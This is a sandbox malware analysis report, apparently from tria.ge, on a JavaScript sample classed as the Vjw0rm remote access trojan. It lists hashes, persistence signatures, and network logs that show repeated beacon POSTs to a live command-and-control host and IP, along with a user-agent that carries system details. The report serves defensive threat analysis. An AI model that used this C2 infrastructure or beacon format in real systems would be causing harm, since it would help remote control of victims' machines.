Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

9b647c40e9...5d7.js

windows7-x64

10

9b647c40e9...5d7.js

windows10-2004-x64

10

Analysis

  • max time kernel
    145s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231222-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17/02/2024, 04:40 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    9b647c40e98c2de028ce703d6b5558b6a9a9d75a59c7cdd81d78e71aea0c25d7.js

  • Size

    6KB

  • MD5

    edd277e7a04ec062c49bafdb7d8b07af

  • SHA1

    1ff9c18bacf61a830f4f7001c5e19f8868ceb6b8

  • SHA256

    9b647c40e98c2de028ce703d6b5558b6a9a9d75a59c7cdd81d78e71aea0c25d7

  • SHA512

    fe118202237beae08ed786fa6905c418e18c9b27a40083911ebe77bd23c7584124eb5ff4422a0b9f9d49f7dbc7a618b2a30cefc938cdbcb36cc30d6b711778af

  • SSDEEP

    96:FnYZH1uypXd3HofJBslCFGJc9lBdqlr+bXcCnTBw5BdeCldb+rNeUo0:BYZVhDrLlriXcCnTBw5BdnldCrNHo0

Score
10/10
vjw0rmpersistencetrojanworm

Malware Config

Extracted

Family

vjw0rm

C2

http://newyear7250.duckdns.org:7250

Signatures

  • Vjw0rm

    Vjw0rm is a remote access trojan written in JavaScript.

    trojanwormvjw0rm
  • Blocklisted process makes network request 1 IoCs
  • Drops startup file 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\9b647c40e98c2de028ce703d6b5558b6a9a9d75a59c7cdd81d78e71aea0c25d7.js
    1⤵
    • Blocklisted process makes network request
    • Drops startup file
    • Adds Run key to start application
    PID:472

Network

  • flag-us
    DNS
    newyear7250.duckdns.org
    wscript.exe
    Remote address:
    8.8.8.8:53
    Request
    newyear7250.duckdns.org
    IN A
    Response
    newyear7250.duckdns.org
    IN A
    194.147.140.174
  • flag-ua
    POST
    http://newyear7250.duckdns.org:7250/Vre
    wscript.exe
    Remote address:
    194.147.140.174:7250
    Request
    POST /Vre HTTP/1.1
    Accept: */*
    User-Agent: NEWYEAR_92773AA9\ZHCNTALV\Admin\Microsoft Windows 10 Pro\undefined\\YES\FALSE\
    Accept-Language: en-us
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    Host: newyear7250.duckdns.org:7250
    Content-Length: 0
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Transfer-Encoding: chunked
    Server: Microsoft-HTTPAPI/2.0
    Date: Sat, 17 Feb 2024 04:40:58 GMT
  • flag-ua
    POST
    http://newyear7250.duckdns.org:7250/Vre
    wscript.exe
    Remote address:
    194.147.140.174:7250
    Request
    POST /Vre HTTP/1.1
    Accept: */*
    User-Agent: NEWYEAR_92773AA9\ZHCNTALV\Admin\Microsoft Windows 10 Pro\undefined\\YES\FALSE\
    Accept-Language: en-us
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    Host: newyear7250.duckdns.org:7250
    Content-Length: 0
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Transfer-Encoding: chunked
    Server: Microsoft-HTTPAPI/2.0
    Date: Sat, 17 Feb 2024 04:41:28 GMT
  • flag-ua
    POST
    http://newyear7250.duckdns.org:7250/Vre
    wscript.exe
    Remote address:
    194.147.140.174:7250
    Request
    POST /Vre HTTP/1.1
    Accept: */*
    User-Agent: NEWYEAR_92773AA9\ZHCNTALV\Admin\Microsoft Windows 10 Pro\undefined\\YES\FALSE\
    Accept-Language: en-us
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    Host: newyear7250.duckdns.org:7250
    Content-Length: 0
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Transfer-Encoding: chunked
    Server: Microsoft-HTTPAPI/2.0
    Date: Sat, 17 Feb 2024 04:41:57 GMT
  • flag-ua
    POST
    http://newyear7250.duckdns.org:7250/Vre
    wscript.exe
    Remote address:
    194.147.140.174:7250
    Request
    POST /Vre HTTP/1.1
    Accept: */*
    User-Agent: NEWYEAR_92773AA9\ZHCNTALV\Admin\Microsoft Windows 10 Pro\undefined\\YES\FALSE\
    Accept-Language: en-us
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    Host: newyear7250.duckdns.org:7250
    Content-Length: 0
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Transfer-Encoding: chunked
    Server: Microsoft-HTTPAPI/2.0
    Date: Sat, 17 Feb 2024 04:42:26 GMT
  • flag-ua
    POST
    http://newyear7250.duckdns.org:7250/Vre
    wscript.exe
    Remote address:
    194.147.140.174:7250
    Request
    POST /Vre HTTP/1.1
    Accept: */*
    User-Agent: NEWYEAR_92773AA9\ZHCNTALV\Admin\Microsoft Windows 10 Pro\undefined\\YES\FALSE\
    Accept-Language: en-us
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    Host: newyear7250.duckdns.org:7250
    Content-Length: 0
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Transfer-Encoding: chunked
    Server: Microsoft-HTTPAPI/2.0
    Date: Sat, 17 Feb 2024 04:42:54 GMT
  • flag-ua
    POST
    http://newyear7250.duckdns.org:7250/Vre
    wscript.exe
    Remote address:
    194.147.140.174:7250
    Request
    POST /Vre HTTP/1.1
    Accept: */*
    User-Agent: NEWYEAR_92773AA9\ZHCNTALV\Admin\Microsoft Windows 10 Pro\undefined\\YES\FALSE\
    Accept-Language: en-us
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    Host: newyear7250.duckdns.org:7250
    Content-Length: 0
    Connection: Keep-Alive
    Cache-Control: no-cache
  • flag-us
    DNS
    28.118.140.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    28.118.140.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    174.140.147.194.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    174.140.147.194.in-addr.arpa
    IN PTR
    Response
    174.140.147.194.in-addr.arpa
    IN PTR
    194147170174 zero-logsvpn
  • flag-us
    DNS
    79.121.231.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    79.121.231.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    68.32.126.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    68.32.126.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    180.178.17.96.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    180.178.17.96.in-addr.arpa
    IN PTR
    Response
    180.178.17.96.in-addr.arpa
    IN PTR
    a96-17-178-180deploystaticakamaitechnologiescom
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    209.205.72.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    209.205.72.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    217.106.137.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    217.106.137.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    50.23.12.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    50.23.12.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    56.126.166.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    56.126.166.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    217.135.221.88.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    217.135.221.88.in-addr.arpa
    IN PTR
    Response
    217.135.221.88.in-addr.arpa
    IN PTR
    a88-221-135-217deploystaticakamaitechnologiescom
  • flag-us
    DNS
    0.205.248.87.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    0.205.248.87.in-addr.arpa
    IN PTR
    Response
    0.205.248.87.in-addr.arpa
    IN PTR
    https-87-248-205-0lgwllnwnet
  • flag-us
    DNS
    43.229.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    43.229.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239317300952_1E3SWPMLL78HDQL83&pid=21.2&w=1920&h=1080&c=4
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239317300952_1E3SWPMLL78HDQL83&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 247144
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: B941ED7E26084C51942E31FF8DF97B9A Ref B: LON04EDGE0910 Ref C: 2024-02-17T04:42:10Z
    date: Sat, 17 Feb 2024 04:42:09 GMT
  • flag-us
    DNS
    88.65.42.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    88.65.42.20.in-addr.arpa
    IN PTR
    Response
  • 194.147.140.174:7250
    http://newyear7250.duckdns.org:7250/Vre
    http
    wscript.exe
    2.4kB
     1.1kB
     13
    12

    HTTP Request

    POST http://newyear7250.duckdns.org:7250/Vre

    HTTP Response

    200

    HTTP Request

    POST http://newyear7250.duckdns.org:7250/Vre

    HTTP Response

    200

    HTTP Request

    POST http://newyear7250.duckdns.org:7250/Vre

    HTTP Response

    200

    HTTP Request

    POST http://newyear7250.duckdns.org:7250/Vre

    HTTP Response

    200

    HTTP Request

    POST http://newyear7250.duckdns.org:7250/Vre

    HTTP Response

    200

    HTTP Request

    POST http://newyear7250.duckdns.org:7250/Vre
  • 204.79.197.200:443
    tls, https
    82 B
     40 B
     1
    1
  • 204.79.197.200:443
    322 B
     7
  • 204.79.197.200:443
    https://tse1.mm.bing.net/th?id=OADD2.10239317300952_1E3SWPMLL78HDQL83&pid=21.2&w=1920&h=1080&c=4
    tls, http2
    13.3kB
     264.6kB
     206
    204

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239317300952_1E3SWPMLL78HDQL83&pid=21.2&w=1920&h=1080&c=4

    HTTP Response

    200
  • 8.8.8.8:53
    newyear7250.duckdns.org
    dns
    wscript.exe
    69 B
     85 B
     1
    1

    DNS Request

    newyear7250.duckdns.org

    DNS Response

    194.147.140.174

  • 8.8.8.8:53
    28.118.140.52.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    28.118.140.52.in-addr.arpa

  • 8.8.8.8:53
    174.140.147.194.in-addr.arpa
    dns
    74 B
     117 B
     1
    1

    DNS Request

    174.140.147.194.in-addr.arpa

  • 8.8.8.8:53
    79.121.231.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    79.121.231.20.in-addr.arpa

  • 8.8.8.8:53
    68.32.126.40.in-addr.arpa
    dns
    71 B
     157 B
     1
    1

    DNS Request

    68.32.126.40.in-addr.arpa

  • 8.8.8.8:53
    180.178.17.96.in-addr.arpa
    dns
    72 B
     137 B
     1
    1

    DNS Request

    180.178.17.96.in-addr.arpa

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
     144 B
     1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    209.205.72.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    209.205.72.20.in-addr.arpa

  • 8.8.8.8:53
    217.106.137.52.in-addr.arpa
    dns
    73 B
     147 B
     1
    1

    DNS Request

    217.106.137.52.in-addr.arpa

  • 8.8.8.8:53
    50.23.12.20.in-addr.arpa
    dns
    70 B
     156 B
     1
    1

    DNS Request

    50.23.12.20.in-addr.arpa

  • 8.8.8.8:53
    56.126.166.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    56.126.166.20.in-addr.arpa

  • 8.8.8.8:53
    217.135.221.88.in-addr.arpa
    dns
    73 B
     139 B
     1
    1

    DNS Request

    217.135.221.88.in-addr.arpa

  • 8.8.8.8:53
    0.205.248.87.in-addr.arpa
    dns
    71 B
     116 B
     1
    1

    DNS Request

    0.205.248.87.in-addr.arpa

  • 8.8.8.8:53
    43.229.111.52.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    43.229.111.52.in-addr.arpa

  • 8.8.8.8:53
    88.65.42.20.in-addr.arpa
    dns
    70 B
     156 B
     1
    1

    DNS Request

    88.65.42.20.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.